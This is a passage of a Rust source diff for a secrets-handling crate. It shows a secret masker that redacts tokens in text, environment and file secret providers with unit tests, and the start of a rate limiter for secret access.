pub fn new() -> Self {
|
||||
Self {
|
||||
secrets: HashSet::new(),
|
||||
secret_cache: HashMap::new(),
|
||||
mask_char: '*',
|
||||
min_length: 3, // Don't mask very short strings
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new secret masker with custom mask character
|
||||
pub fn with_mask_char(mask_char: char) -> Self {
|
||||
Self {
|
||||
secrets: HashSet::new(),
|
||||
secret_cache: HashMap::new(),
|
||||
mask_char,
|
||||
min_length: 3,
|
||||
}
|
||||
}
|
||||
|
||||
/// Add a secret to be masked
|
||||
pub fn add_secret(&mut self, secret: impl Into<String>) {
|
||||
let secret = secret.into();
|
||||
if secret.len() >= self.min_length {
|
||||
let masked = self.create_mask(&secret);
|
||||
self.secret_cache.insert(secret.clone(), masked);
|
||||
self.secrets.insert(secret);
|
||||
}
|
||||
}
|
||||
|
||||
/// Add multiple secrets to be masked
|
||||
pub fn add_secrets(&mut self, secrets: impl IntoIterator<Item = String>) {
|
||||
for secret in secrets {
|
||||
self.add_secret(secret);
|
||||
}
|
||||
}
|
||||
|
||||
/// Remove a secret from masking
|
||||
pub fn remove_secret(&mut self, secret: &str) {
|
||||
self.secrets.remove(secret);
|
||||
self.secret_cache.remove(secret);
|
||||
}
|
||||
|
||||
/// Clear all secrets
|
||||
pub fn clear(&mut self) {
|
||||
self.secrets.clear();
|
||||
self.secret_cache.clear();
|
||||
}
|
||||
|
||||
/// Mask secrets in the given text
|
||||
pub fn mask(&self, text: &str) -> String {
|
||||
let mut result = text.to_string();
|
||||
|
||||
// Use cached masked versions for better performance
|
||||
for secret in &self.secrets {
|
||||
if !secret.is_empty() {
|
||||
if let Some(masked) = self.secret_cache.get(secret) {
|
||||
result = result.replace(secret, masked);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Also mask potential tokens and keys with regex patterns
|
||||
result = self.mask_patterns(&result);
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
/// Create a mask for a secret, preserving some structure for debugging
|
||||
fn create_mask(&self, secret: &str) -> String {
|
||||
let len = secret.len();
|
||||
|
||||
if len <= 3 {
|
||||
// Very short secrets - mask completely
|
||||
self.mask_char.to_string().repeat(3)
|
||||
} else if len <= 8 {
|
||||
// Short secrets - show first character
|
||||
format!(
|
||||
"{}{}",
|
||||
secret.chars().next().unwrap(),
|
||||
self.mask_char.to_string().repeat(len - 1)
|
||||
)
|
||||
} else {
|
||||
// Longer secrets - show first 2 and last 2 characters
|
||||
let chars: Vec<char> = secret.chars().collect();
|
||||
let first_two = chars.iter().take(2).collect::<String>();
|
||||
let last_two = chars.iter().skip(len - 2).collect::<String>();
|
||||
let middle_mask = self.mask_char.to_string().repeat(len - 4);
|
||||
format!("{}{}{}", first_two, middle_mask, last_two)
|
||||
}
|
||||
}
|
||||
|
||||
/// Mask common patterns that look like secrets
|
||||
fn mask_patterns(&self, text: &str) -> String {
|
||||
let patterns = PATTERNS.get_or_init(CompiledPatterns::new);
|
||||
let mut result = text.to_string();
|
||||
|
||||
// GitHub Personal Access Tokens
|
||||
result = patterns
|
||||
.github_pat
|
||||
.replace_all(&result, "ghp_***")
|
||||
.to_string();
|
||||
|
||||
// GitHub App tokens
|
||||
result = patterns
|
||||
.github_app
|
||||
.replace_all(&result, "ghs_***")
|
||||
.to_string();
|
||||
|
||||
// GitHub OAuth tokens
|
||||
result = patterns
|
||||
.github_oauth
|
||||
.replace_all(&result, "gho_***")
|
||||
.to_string();
|
||||
|
||||
// AWS Access Key IDs
|
||||
result = patterns
|
||||
.aws_access_key
|
||||
.replace_all(&result, "AKIA***")
|
||||
.to_string();
|
||||
|
||||
// AWS Secret Access Keys (basic pattern)
|
||||
// Only mask if it's clearly in a secret context (basic heuristic)
|
||||
if text.to_lowercase().contains("secret") || text.to_lowercase().contains("key") {
|
||||
result = patterns.aws_secret.replace_all(&result, "***").to_string();
|
||||
}
|
||||
|
||||
// JWT tokens (basic pattern)
|
||||
result = patterns
|
||||
.jwt
|
||||
.replace_all(&result, "eyJ***.eyJ***.***")
|
||||
.to_string();
|
||||
|
||||
// API keys with common prefixes
|
||||
result = patterns
|
||||
.api_key
|
||||
.replace_all(&result, "${1}=***")
|
||||
.to_string();
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
/// Check if text contains any secrets
|
||||
pub fn contains_secrets(&self, text: &str) -> bool {
|
||||
for secret in &self.secrets {
|
||||
if text.contains(secret) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
// Also check for common patterns
|
||||
self.has_secret_patterns(text)
|
||||
}
|
||||
|
||||
/// Check if text contains common secret patterns
|
||||
fn has_secret_patterns(&self, text: &str) -> bool {
|
||||
let patterns = PATTERNS.get_or_init(CompiledPatterns::new);
|
||||
|
||||
patterns.github_pat.is_match(text)
|
||||
|| patterns.github_app.is_match(text)
|
||||
|| patterns.github_oauth.is_match(text)
|
||||
|| patterns.aws_access_key.is_match(text)
|
||||
|| patterns.jwt.is_match(text)
|
||||
}
|
||||
|
||||
/// Get the number of secrets being tracked
|
||||
pub fn secret_count(&self) -> usize {
|
||||
self.secrets.len()
|
||||
}
|
||||
|
||||
/// Check if a specific secret is being tracked
|
||||
pub fn has_secret(&self, secret: &str) -> bool {
|
||||
self.secrets.contains(secret)
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for SecretMasker {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_basic_masking() {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("secret123");
|
||||
masker.add_secret("password456");
|
||||
|
||||
let input = "The secret is secret123 and password is password456";
|
||||
let masked = masker.mask(input);
|
||||
|
||||
assert!(!masked.contains("secret123"));
|
||||
assert!(!masked.contains("password456"));
|
||||
assert!(masked.contains("***"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_preserve_structure() {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("verylongsecretkey123");
|
||||
|
||||
let input = "Key: verylongsecretkey123";
|
||||
let masked = masker.mask(input);
|
||||
|
||||
// Should preserve first 2 and last 2 characters
|
||||
assert!(masked.contains("ve"));
|
||||
assert!(masked.contains("23"));
|
||||
assert!(masked.contains("***"));
|
||||
assert!(!masked.contains("verylongsecretkey123"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_github_token_patterns() {
|
||||
let masker = SecretMasker::new();
|
||||
|
||||
let input = "Token: ghp_1234567890123456789012345678901234567890";
|
||||
let masked = masker.mask(input);
|
||||
|
||||
assert!(!masked.contains("ghp_1234567890123456789012345678901234567890"));
|
||||
assert!(masked.contains("ghp_***"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_aws_access_key_patterns() {
|
||||
let masker = SecretMasker::new();
|
||||
|
||||
let input = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE";
|
||||
let masked = masker.mask(input);
|
||||
|
||||
assert!(!masked.contains("AKIAIOSFODNN7EXAMPLE"));
|
||||
assert!(masked.contains("AKIA***"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_jwt_token_patterns() {
|
||||
let masker = SecretMasker::new();
|
||||
|
||||
let input = "JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c";
|
||||
let masked = masker.mask(input);
|
||||
|
||||
assert!(masked.contains("eyJ***.eyJ***.***"));
|
||||
assert!(!masked.contains("SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_contains_secrets() {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("secret123");
|
||||
|
||||
assert!(masker.contains_secrets("The secret is secret123"));
|
||||
assert!(!masker.contains_secrets("No secrets here"));
|
||||
assert!(masker.contains_secrets("Token: ghp_1234567890123456789012345678901234567890"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_short_secrets() {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("ab"); // Too short, should not be added
|
||||
masker.add_secret("abc"); // Minimum length
|
||||
|
||||
assert_eq!(masker.secret_count(), 1);
|
||||
assert!(!masker.has_secret("ab"));
|
||||
assert!(masker.has_secret("abc"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_custom_mask_char() {
|
||||
let mut masker = SecretMasker::with_mask_char('X');
|
||||
masker.add_secret("secret123");
|
||||
|
||||
let input = "The secret is secret123";
|
||||
let masked = masker.mask(input);
|
||||
|
||||
assert!(masked.contains("XX"));
|
||||
assert!(!masked.contains("**"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_remove_secret() {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("secret123");
|
||||
masker.add_secret("password456");
|
||||
|
||||
assert_eq!(masker.secret_count(), 2);
|
||||
|
||||
masker.remove_secret("secret123");
|
||||
assert_eq!(masker.secret_count(), 1);
|
||||
assert!(!masker.has_secret("secret123"));
|
||||
assert!(masker.has_secret("password456"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_clear_secrets() {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("secret123");
|
||||
masker.add_secret("password456");
|
||||
|
||||
assert_eq!(masker.secret_count(), 2);
|
||||
|
||||
masker.clear();
|
||||
assert_eq!(masker.secret_count(), 0);
|
||||
}
|
||||
}
|
||||
143
crates/secrets/src/providers/env.rs
Normal file
143
crates/secrets/src/providers/env.rs
Normal file
@@ -0,0 +1,143 @@
|
||||
use crate::{
|
||||
validation::validate_secret_value, SecretError, SecretProvider, SecretResult, SecretValue,
|
||||
};
|
||||
use async_trait::async_trait;
|
||||
use std::collections::HashMap;
|
||||
|
||||
/// Environment variable secret provider
|
||||
pub struct EnvironmentProvider {
|
||||
prefix: Option<String>,
|
||||
}
|
||||
|
||||
impl EnvironmentProvider {
|
||||
/// Create a new environment provider
|
||||
pub fn new(prefix: Option<String>) -> Self {
|
||||
Self { prefix }
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for EnvironmentProvider {
|
||||
fn default() -> Self {
|
||||
Self::new(None)
|
||||
}
|
||||
}
|
||||
|
||||
impl EnvironmentProvider {
|
||||
/// Get the full environment variable name
|
||||
fn get_env_name(&self, name: &str) -> String {
|
||||
match &self.prefix {
|
||||
Some(prefix) => format!("{}{}", prefix, name),
|
||||
None => name.to_string(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl SecretProvider for EnvironmentProvider {
|
||||
async fn get_secret(&self, name: &str) -> SecretResult<SecretValue> {
|
||||
let env_name = self.get_env_name(name);
|
||||
|
||||
match std::env::var(&env_name) {
|
||||
Ok(value) => {
|
||||
// Validate the secret value
|
||||
validate_secret_value(&value)?;
|
||||
|
||||
let mut metadata = HashMap::new();
|
||||
metadata.insert("source".to_string(), "environment".to_string());
|
||||
metadata.insert("env_var".to_string(), env_name);
|
||||
|
||||
Ok(SecretValue::with_metadata(value, metadata))
|
||||
}
|
||||
Err(std::env::VarError::NotPresent) => Err(SecretError::not_found(name)),
|
||||
Err(std::env::VarError::NotUnicode(_)) => Err(SecretError::InvalidFormat(format!(
|
||||
"Environment variable '{}' contains invalid Unicode",
|
||||
env_name
|
||||
))),
|
||||
}
|
||||
}
|
||||
|
||||
async fn list_secrets(&self) -> SecretResult<Vec<String>> {
|
||||
let mut secrets = Vec::new();
|
||||
|
||||
for (key, _) in std::env::vars() {
|
||||
if let Some(prefix) = &self.prefix {
|
||||
if key.starts_with(prefix) {
|
||||
secrets.push(key[prefix.len()..].to_string());
|
||||
}
|
||||
} else {
|
||||
// Without a prefix, we can't distinguish secrets from regular env vars
|
||||
// So we'll return an error suggesting the use of a prefix
|
||||
return Err(SecretError::internal(
|
||||
"Cannot list secrets from environment without a prefix. Configure a prefix like 'WRKFLW_SECRET_'"
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(secrets)
|
||||
}
|
||||
|
||||
fn name(&self) -> &str {
|
||||
"environment"
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_environment_provider_basic() {
|
||||
let provider = EnvironmentProvider::default();
|
||||
|
||||
// Use unique secret name to avoid test conflicts
|
||||
let test_secret_name = format!("TEST_SECRET_{}", std::process::id());
|
||||
std::env::set_var(&test_secret_name, "test_value");
|
||||
|
||||
let result = provider.get_secret(&test_secret_name).await;
|
||||
assert!(result.is_ok());
|
||||
|
||||
let secret = result.unwrap();
|
||||
assert_eq!(secret.value(), "test_value");
|
||||
assert_eq!(
|
||||
secret.metadata.get("source"),
|
||||
Some(&"environment".to_string())
|
||||
);
|
||||
|
||||
// Clean up
|
||||
std::env::remove_var(&test_secret_name);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_environment_provider_with_prefix() {
|
||||
let provider = EnvironmentProvider::new(Some("WRKFLW_SECRET_".to_string()));
|
||||
|
||||
// Use unique secret name to avoid test conflicts
|
||||
let test_secret_name = format!("API_KEY_{}", std::process::id());
|
||||
let full_env_name = format!("WRKFLW_SECRET_{}", test_secret_name);
|
||||
std::env::set_var(&full_env_name, "secret_api_key");
|
||||
|
||||
let result = provider.get_secret(&test_secret_name).await;
|
||||
assert!(result.is_ok());
|
||||
|
||||
let secret = result.unwrap();
|
||||
assert_eq!(secret.value(), "secret_api_key");
|
||||
|
||||
// Clean up
|
||||
std::env::remove_var(&full_env_name);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_environment_provider_not_found() {
|
||||
let provider = EnvironmentProvider::default();
|
||||
|
||||
let result = provider.get_secret("NONEXISTENT_SECRET").await;
|
||||
assert!(result.is_err());
|
||||
|
||||
match result.unwrap_err() {
|
||||
SecretError::NotFound { name } => {
|
||||
assert_eq!(name, "NONEXISTENT_SECRET");
|
||||
}
|
||||
_ => panic!("Expected NotFound error"),
|
||||
}
|
||||
}
|
||||
}
|
||||
288
crates/secrets/src/providers/file.rs
Normal file
288
crates/secrets/src/providers/file.rs
Normal file
@@ -0,0 +1,288 @@
|
||||
use crate::{
|
||||
validation::validate_secret_value, SecretError, SecretProvider, SecretResult, SecretValue,
|
||||
};
|
||||
use async_trait::async_trait;
|
||||
use serde_json::Value;
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
|
||||
/// File-based secret provider
|
||||
pub struct FileProvider {
|
||||
path: String,
|
||||
}
|
||||
|
||||
impl FileProvider {
|
||||
/// Create a new file provider
|
||||
pub fn new(path: impl Into<String>) -> Self {
|
||||
Self { path: path.into() }
|
||||
}
|
||||
|
||||
/// Expand tilde in path
|
||||
fn expand_path(&self) -> String {
|
||||
if self.path.starts_with("~/") {
|
||||
if let Some(home) = dirs::home_dir() {
|
||||
return home.join(&self.path[2..]).to_string_lossy().to_string();
|
||||
}
|
||||
}
|
||||
self.path.clone()
|
||||
}
|
||||
|
||||
/// Load secrets from JSON file
|
||||
async fn load_json_secrets(&self, file_path: &Path) -> SecretResult<HashMap<String, String>> {
|
||||
let content = tokio::fs::read_to_string(file_path).await?;
|
||||
let json: Value = serde_json::from_str(&content)?;
|
||||
|
||||
let mut secrets = HashMap::new();
|
||||
if let Value::Object(obj) = json {
|
||||
for (key, value) in obj {
|
||||
if let Value::String(secret_value) = value {
|
||||
secrets.insert(key, secret_value);
|
||||
} else {
|
||||
secrets.insert(key, value.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(secrets)
|
||||
}
|
||||
|
||||
/// Load secrets from YAML file
|
||||
async fn load_yaml_secrets(&self, file_path: &Path) -> SecretResult<HashMap<String, String>> {
|
||||
let content = tokio::fs::read_to_string(file_path).await?;
|
||||
let yaml: serde_yaml::Value = serde_yaml::from_str(&content)?;
|
||||
|
||||
let mut secrets = HashMap::new();
|
||||
if let serde_yaml::Value::Mapping(map) = yaml {
|
||||
for (key, value) in map {
|
||||
if let (serde_yaml::Value::String(k), v) = (key, value) {
|
||||
let secret_value = match v {
|
||||
serde_yaml::Value::String(s) => s,
|
||||
_ => serde_yaml::to_string(&v)?.trim().to_string(),
|
||||
};
|
||||
secrets.insert(k, secret_value);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(secrets)
|
||||
}
|
||||
|
||||
/// Load secrets from environment-style file
|
||||
async fn load_env_secrets(&self, file_path: &Path) -> SecretResult<HashMap<String, String>> {
|
||||
let content = tokio::fs::read_to_string(file_path).await?;
|
||||
let mut secrets = HashMap::new();
|
||||
|
||||
for line in content.lines() {
|
||||
let line = line.trim();
|
||||
if line.is_empty() || line.starts_with('#') {
|
||||
continue;
|
||||
}
|
||||
|
||||
if let Some((key, value)) = line.split_once('=') {
|
||||
let key = key.trim().to_string();
|
||||
let value = value.trim();
|
||||
|
||||
// Handle quoted values
|
||||
let value = if (value.starts_with('"') && value.ends_with('"'))
|
||||
|| (value.starts_with('\'') && value.ends_with('\''))
|
||||
{
|
||||
&value[1..value.len() - 1]
|
||||
} else {
|
||||
value
|
||||
};
|
||||
|
||||
secrets.insert(key, value.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
Ok(secrets)
|
||||
}
|
||||
|
||||
/// Load all secrets from the configured path
|
||||
async fn load_secrets(&self) -> SecretResult<HashMap<String, String>> {
|
||||
let expanded_path = self.expand_path();
|
||||
let path = Path::new(&expanded_path);
|
||||
|
||||
if !path.exists() {
|
||||
return Ok(HashMap::new());
|
||||
}
|
||||
|
||||
if path.is_file() {
|
||||
// Single file - determine format by extension
|
||||
if let Some(extension) = path.extension().and_then(|ext| ext.to_str()) {
|
||||
match extension.to_lowercase().as_str() {
|
||||
"json" => self.load_json_secrets(path).await,
|
||||
"yml" | "yaml" => self.load_yaml_secrets(path).await,
|
||||
"env" => self.load_env_secrets(path).await,
|
||||
_ => {
|
||||
// Default to environment format for unknown extensions
|
||||
self.load_env_secrets(path).await
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// No extension, try environment format
|
||||
self.load_env_secrets(path).await
|
||||
}
|
||||
} else {
|
||||
// Directory - load from multiple files
|
||||
let mut all_secrets = HashMap::new();
|
||||
let mut entries = tokio::fs::read_dir(path).await?;
|
||||
|
||||
while let Some(entry) = entries.next_entry().await? {
|
||||
let entry_path = entry.path();
|
||||
if entry_path.is_file() {
|
||||
if let Some(extension) = entry_path.extension().and_then(|ext| ext.to_str()) {
|
||||
let secrets = match extension.to_lowercase().as_str() {
|
||||
"json" => self.load_json_secrets(&entry_path).await?,
|
||||
"yml" | "yaml" => self.load_yaml_secrets(&entry_path).await?,
|
||||
"env" => self.load_env_secrets(&entry_path).await?,
|
||||
_ => continue, // Skip unknown file types
|
||||
};
|
||||
all_secrets.extend(secrets);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(all_secrets)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl SecretProvider for FileProvider {
|
||||
async fn get_secret(&self, name: &str) -> SecretResult<SecretValue> {
|
||||
let secrets = self.load_secrets().await?;
|
||||
|
||||
if let Some(value) = secrets.get(name) {
|
||||
// Validate the secret value
|
||||
validate_secret_value(value)?;
|
||||
|
||||
let mut metadata = HashMap::new();
|
||||
metadata.insert("source".to_string(), "file".to_string());
|
||||
metadata.insert("file_path".to_string(), self.expand_path());
|
||||
|
||||
Ok(SecretValue::with_metadata(value.clone(), metadata))
|
||||
} else {
|
||||
Err(SecretError::not_found(name))
|
||||
}
|
||||
}
|
||||
|
||||
async fn list_secrets(&self) -> SecretResult<Vec<String>> {
|
||||
let secrets = self.load_secrets().await?;
|
||||
Ok(secrets.keys().cloned().collect())
|
||||
}
|
||||
|
||||
fn name(&self) -> &str {
|
||||
"file"
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use tempfile::TempDir;
|
||||
|
||||
async fn create_test_json_file(dir: &TempDir, content: &str) -> String {
|
||||
let file_path = dir.path().join("secrets.json");
|
||||
tokio::fs::write(&file_path, content).await.unwrap();
|
||||
file_path.to_string_lossy().to_string()
|
||||
}
|
||||
|
||||
async fn create_test_env_file(dir: &TempDir, content: &str) -> String {
|
||||
let file_path = dir.path().join("secrets.env");
|
||||
tokio::fs::write(&file_path, content).await.unwrap();
|
||||
file_path.to_string_lossy().to_string()
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_file_provider_json() {
|
||||
let temp_dir = TempDir::new().unwrap();
|
||||
let file_path = create_test_json_file(
|
||||
&temp_dir,
|
||||
r#"
|
||||
{
|
||||
"API_KEY": "secret_api_key",
|
||||
"DB_PASSWORD": "secret_password"
|
||||
}
|
||||
"#,
|
||||
)
|
||||
.await;
|
||||
|
||||
let provider = FileProvider::new(file_path);
|
||||
|
||||
let result = provider.get_secret("API_KEY").await;
|
||||
assert!(result.is_ok());
|
||||
|
||||
let secret = result.unwrap();
|
||||
assert_eq!(secret.value(), "secret_api_key");
|
||||
assert_eq!(secret.metadata.get("source"), Some(&"file".to_string()));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_file_provider_env_format() {
|
||||
let temp_dir = TempDir::new().unwrap();
|
||||
let file_path = create_test_env_file(
|
||||
&temp_dir,
|
||||
r#"
|
||||
# This is a comment
|
||||
API_KEY=secret_api_key
|
||||
DB_PASSWORD="quoted password"
|
||||
GITHUB_TOKEN='single quoted token'
|
||||
"#,
|
||||
)
|
||||
.await;
|
||||
|
||||
let provider = FileProvider::new(file_path);
|
||||
|
||||
let api_key = provider.get_secret("API_KEY").await.unwrap();
|
||||
assert_eq!(api_key.value(), "secret_api_key");
|
||||
|
||||
let password = provider.get_secret("DB_PASSWORD").await.unwrap();
|
||||
assert_eq!(password.value(), "quoted password");
|
||||
|
||||
let token = provider.get_secret("GITHUB_TOKEN").await.unwrap();
|
||||
assert_eq!(token.value(), "single quoted token");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_file_provider_not_found() {
|
||||
let temp_dir = TempDir::new().unwrap();
|
||||
let file_path = create_test_json_file(&temp_dir, "{}").await;
|
||||
|
||||
let provider = FileProvider::new(file_path);
|
||||
|
||||
let result = provider.get_secret("NONEXISTENT").await;
|
||||
assert!(result.is_err());
|
||||
|
||||
match result.unwrap_err() {
|
||||
SecretError::NotFound { name } => {
|
||||
assert_eq!(name, "NONEXISTENT");
|
||||
}
|
||||
_ => panic!("Expected NotFound error"),
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_file_provider_list_secrets() {
|
||||
let temp_dir = TempDir::new().unwrap();
|
||||
let file_path = create_test_json_file(
|
||||
&temp_dir,
|
||||
r#"
|
||||
{
|
||||
"SECRET_1": "value1",
|
||||
"SECRET_2": "value2",
|
||||
"SECRET_3": "value3"
|
||||
}
|
||||
"#,
|
||||
)
|
||||
.await;
|
||||
|
||||
let provider = FileProvider::new(file_path);
|
||||
|
||||
let secrets = provider.list_secrets().await.unwrap();
|
||||
assert_eq!(secrets.len(), 3);
|
||||
assert!(secrets.contains(&"SECRET_1".to_string()));
|
||||
assert!(secrets.contains(&"SECRET_2".to_string()));
|
||||
assert!(secrets.contains(&"SECRET_3".to_string()));
|
||||
}
|
||||
}
|
||||
91
crates/secrets/src/providers/mod.rs
Normal file
91
crates/secrets/src/providers/mod.rs
Normal file
@@ -0,0 +1,91 @@
|
||||
use crate::{SecretError, SecretResult};
|
||||
use async_trait::async_trait;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
|
||||
pub mod env;
|
||||
pub mod file;
|
||||
|
||||
// Cloud provider modules are planned for future implementation
|
||||
// #[cfg(feature = "vault-provider")]
|
||||
// pub mod vault;
|
||||
|
||||
// #[cfg(feature = "aws-provider")]
|
||||
// pub mod aws;
|
||||
|
||||
// #[cfg(feature = "azure-provider")]
|
||||
// pub mod azure;
|
||||
|
||||
// #[cfg(feature = "gcp-provider")]
|
||||
// pub mod gcp;
|
||||
|
||||
/// A secret value with metadata
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct SecretValue {
|
||||
/// The actual secret value
|
||||
value: String,
|
||||
/// Optional metadata about the secret
|
||||
pub metadata: HashMap<String, String>,
|
||||
/// When this secret was retrieved (for caching)
|
||||
pub retrieved_at: chrono::DateTime<chrono::Utc>,
|
||||
}
|
||||
|
||||
impl SecretValue {
|
||||
/// Create a new secret value
|
||||
pub fn new(value: impl Into<String>) -> Self {
|
||||
Self {
|
||||
value: value.into(),
|
||||
metadata: HashMap::new(),
|
||||
retrieved_at: chrono::Utc::now(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new secret value with metadata
|
||||
pub fn with_metadata(value: impl Into<String>, metadata: HashMap<String, String>) -> Self {
|
||||
Self {
|
||||
value: value.into(),
|
||||
metadata,
|
||||
retrieved_at: chrono::Utc::now(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Get the secret value
|
||||
pub fn value(&self) -> &str {
|
||||
&self.value
|
||||
}
|
||||
|
||||
/// Check if this secret has expired based on TTL
|
||||
pub fn is_expired(&self, ttl_seconds: u64) -> bool {
|
||||
let now = chrono::Utc::now();
|
||||
let elapsed = now.signed_duration_since(self.retrieved_at);
|
||||
elapsed.num_seconds() > ttl_seconds as i64
|
||||
}
|
||||
}
|
||||
|
||||
/// Trait for secret providers
|
||||
#[async_trait]
|
||||
pub trait SecretProvider: Send + Sync {
|
||||
/// Get a secret by name
|
||||
async fn get_secret(&self, name: &str) -> SecretResult<SecretValue>;
|
||||
|
||||
/// List available secrets (optional, for providers that support it)
|
||||
async fn list_secrets(&self) -> SecretResult<Vec<String>> {
|
||||
Err(SecretError::internal(
|
||||
"list_secrets not supported by this provider",
|
||||
))
|
||||
}
|
||||
|
||||
/// Check if the provider is healthy/accessible
|
||||
async fn health_check(&self) -> SecretResult<()> {
|
||||
// Default implementation tries to get a non-existent secret
|
||||
// If it returns NotFound, the provider is healthy
|
||||
match self.get_secret("__health_check__").await {
|
||||
Err(SecretError::NotFound { .. }) => Ok(()),
|
||||
Err(e) => Err(e),
|
||||
Ok(_) => Ok(()), // Surprisingly, the health check secret exists
|
||||
}
|
||||
}
|
||||
|
||||
/// Get the provider name
|
||||
fn name(&self) -> &str;
|
||||
}
|
||||
242
crates/secrets/src/rate_limit.rs
Normal file
242
crates/secrets/src/rate_limit.rs
Normal file
@@ -0,0 +1,242 @@
|
||||
// Copyright 2024 wrkflw contributors
|
||||
// SPDX-License-Identifier: MIT
|
||||
|
||||
//! Rate limiting for secret access operations
|
||||
|
||||
use crate::{SecretError, SecretResult};
|
||||
use std::collections::HashMap;
|
||||
use std::sync::Arc;
|
||||
use std::time::{Duration, Instant};
|
||||
use tokio::sync::RwLock;
|
||||
|
||||
/// Rate limiter configuration
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct RateLimitConfig {
|
||||
/// Maximum requests per time window
|
||||
pub max_requests: u32,
|
||||
/// Time window duration
|
||||
pub window_duration: Duration,
|
||||
/// Whether to enable rate limiting
|
||||
pub enabled: bool,
|
||||
}
|
||||
|
||||
impl Default for RateLimitConfig {
|
||||
fn default() -> Self {
|
||||
Self {
|
||||
max_requests: 100,
|
||||
window_duration: Duration::from_secs(60), // 1 minute
|
||||
enabled: true,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Track requests for a specific key
|
||||
#[derive(Debug)]
|
||||
struct RequestTracker {
|
||||
requests: Vec<Instant>,
|
||||
first_request: Instant,
|
||||
}
|
||||
|
||||
impl RequestTracker {
|
||||
fn new() -> Self {
|
||||
let now = Instant::now();
|
||||
Self {
|
||||
requests: Vec::new(),
|
||||
first_request: now,
|
||||
}
|
||||
}
|
||||
|
||||
fn add_request(&mut self, now: Instant) {
|
||||
if self.requests.is_empty() {
|
||||
self.first_request = now;
|
||||
}
|
||||
self.requests.push(now);
|
||||
}
|
||||
|
||||
fn cleanup_old_requests(&mut self, window_duration: Duration, now: Instant) {
|
||||
let cutoff = now - window_duration;
|
||||
self.requests.retain(|&req_time| req_time > cutoff);
|
||||
|
||||
if let Some(&first) = self.requests.first() {
|
||||
self.first_request = first;
|
||||
}
|
||||
}
|
||||
|
||||
fn request_count(&self) -> usize {
|
||||
self.requests.len()
|
||||
}
|
||||
}
|
||||
|
||||
/// Rate limiter for secret access operations
|
||||
pub struct RateLimiter {
|
||||
config: RateLimitConfig,
|
||||
trackers: Arc<RwLock<HashMap<String, RequestTracker>>>,
|
||||
}
|
||||
|
||||
impl RateLimiter {
|
||||
/// Create a new rate limiter with the given configuration
|
||||
pub fn new(config: RateLimitConfig) -> Self {
|
||||
Self {
|
||||
config,
|
||||
trackers: Arc::new(RwLock::new(HashMap::new())),
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if a request should be allowed for the given key
|
||||
pub async fn check_rate_limit(&self, key: &str) -> SecretResult<()> {
|
||||
if !self.config.enabled {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let now = Instant::now();
|
||||
let mut trackers = self.trackers.write().await;
|
||||
|
||||
// Clean up old requests for existing tracker
|
||||
if let Some(tracker) = trackers.get_mut(key) {
|
||||
tracker.cleanup_old_requests(self.config.window_duration, now);
|
||||
|
||||
// Check if we're over the limit
|
||||
if tracker.request_count() >= self.config.max_requests as usize {
|
||||
